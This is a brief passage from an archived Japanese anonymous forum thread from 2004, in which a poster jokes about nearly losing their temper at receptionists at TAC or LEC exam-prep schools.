また煽り職人だ

161 :一般に公正妥当と認められた名無しさん:04/05/31 21:25 ID:1cA2YXf4
まあ、あれだ
タックでもレックでも、受付嬢の態度がアレだと、逆ギレしそうになるわなw
・・・ふ〜。あぶない、あぶないwww

35 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)